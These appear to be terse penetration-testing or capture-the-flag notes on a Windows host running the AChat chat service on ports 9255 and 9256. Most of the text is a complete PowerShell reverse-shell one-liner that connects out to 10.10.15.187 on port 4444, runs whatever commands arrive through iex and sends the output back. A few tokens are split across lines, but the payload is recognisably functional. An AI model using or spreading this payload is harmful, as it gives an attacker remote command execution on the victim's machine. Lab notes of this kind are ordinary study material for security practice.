Ports protocol name version
9255  tcp http  AChat chat system httpd
9256 achat Achat chat system

powershell oneliner
client = New-Object System.Net.Sockets.TCPClient("10.10.15.187",4444);$stream = $client.
GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -
TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $se
ndback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$se
ndbyte.Length);$stream.Flush()};$client.Close()
